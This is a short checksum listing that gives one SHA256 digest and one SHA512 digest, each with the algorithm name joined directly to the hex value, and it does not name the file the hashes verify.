SHA256ea4b2c7dbf2be84aa81e55112e40392a7c54cfabde85d3ece594d834b3c9254d
SHA512eed68bf4aba6af83620591f9cdefbe5e954f5bfbb14116015c215b306ecde7e8f9736b7e886e6ecbc0a71dda8ba2a58c7f4b5b7b6354104652715052e016f91f